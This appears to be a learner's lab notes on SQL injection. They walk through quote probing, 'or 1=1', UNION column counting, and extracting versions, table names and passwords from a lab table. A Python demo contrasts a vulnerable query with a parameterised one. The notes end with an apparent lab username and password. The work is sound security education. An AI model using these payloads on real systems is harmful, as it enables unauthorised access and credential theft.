4. Basic SQL Injection Attacks

NOTE: When searching for any vulnerability, try to think of what the developer's actual intention was with the specific functionality you find on the respective web pages.

In order to do some basic SQL injection testing we could:

  1. Start by testing the characters ' and ''

  2. Test with a space to see if it's looking for an exact match or not: jeremy j

  3. Test with operators: jeremy' or 1=1# / jeremy' or 1=1-- -

  4. Try to exfiltrate more data once you find potential SQL injection.

  5. jeremy' union select null# - returns nothing

  6. jeremy' union select null,null# - returns nothing

  7. jeremy' union select null,null,null# - returns data, which means that the query behind the page has a third, hidden column besides username and e-mail that pulls up some other data the page does not display

  8. For further testing, the page might retrieve the version of the database or something else. Let's try getting the version with: jeremy' union select null,null,version()# - returns the version, such as 8.0.34

  9. Now that we have this, let's see if we can get more information, maybe the names of the tables present in the db: jeremy' union select null,null,table_name from information_schema.tables#

  10. We could also try to get the column names to find more information: jeremy' union select null,null,column_name from information_schema.columns#

Discovery: for this specific example we can start directly with the ' character, as the developers did not specifically protect against it.

  1. Now that we have managed to exfiltrate a bunch of data about columns and tables, it's time to test whether we can extract the user's password: jeremy' union select null,null,password from injection0x01#

A small constraint we should look out for is that some fields might be of different data types, like int, float, string etc. More often than not we would probably have int / string, and if we select the wrong type in our injected query we might end up getting errors. In this case we might have to play around with the syntax in order to match the types and achieve the injection.

Example: if the database used a first column that serves as an id, we could play with something like:

jeremy' union select null(int),1,null,null from injection0x01#

NOTE: Even though in this example we targeted the password field specifically, we can try to exfiltrate other data such as ids, usernames, e-mails etc.
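The union-based extraction above, reproduced against a constructed SQLite database as an added example (not part of the original notes): the vulnerable lookup pastes the username into the query text and leaks the password column through the page's payload, while the parameterised lookup treats the same input as a plain string. Assumptions: SQLite stands in for MySQL, so the payload uses the `-- -` comment form from step 3 instead of `#`; the table name injection0x01 is taken from the notes but its rows are constructed here.

```python
import sqlite3

# Constructed sample rows (not from the lab). The application query below returns
# username, email and role; password is the column it never meant to expose.
ROWS = [
    ("jeremy", "jeremy@example.com", "user", "hunter2-constructed"),
    ("alice", "alice@example.com", "admin", "s3cret-constructed"),
]


def make_db():
    """In-memory SQLite database with the constructed injection0x01 table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE injection0x01 (username TEXT, email TEXT, role TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO injection0x01 VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, username):
    """Input is concatenated into the SQL text: a quote closes the string literal
    and everything after it (or 1=1, union select ...) is parsed as SQL."""
    sql = (
        "SELECT username, email, role FROM injection0x01 "
        f"WHERE username = '{username}'"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Same query with a bound parameter: the driver passes the input as data,
    so quotes, comments and 'union' inside it never reach the SQL parser."""
    sql = "SELECT username, email, role FROM injection0x01 WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def leaked_passwords(rows):
    """Stored passwords that appear anywhere in a result set. A non-empty list
    means a UNION smuggled the hidden column into the application's output."""
    secrets = {row[3] for row in ROWS}
    return sorted(value for row in rows for value in row if value in secrets)


if __name__ == "__main__":
    db = make_db()
    payload = "jeremy' union select null,null,password from injection0x01-- -"
    print("vulnerable:", leaked_passwords(lookup_vulnerable(db, payload)))
    print("safe:      ", leaked_passwords(lookup_safe(db, payload)))
```

Running the block prints the two leaked passwords for the vulnerable lookup and an empty list for the parameterised one; logging the raw SQL error that a mismatched column count produces (steps 5 and 6) is the cheapest detection signal for this probing.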

SQL Injection Cheat Sheet - PortSwigger

https://portswigger.net/web-security/sql-injection/cheat-sheet

user: takeshi:onigirigadaisuki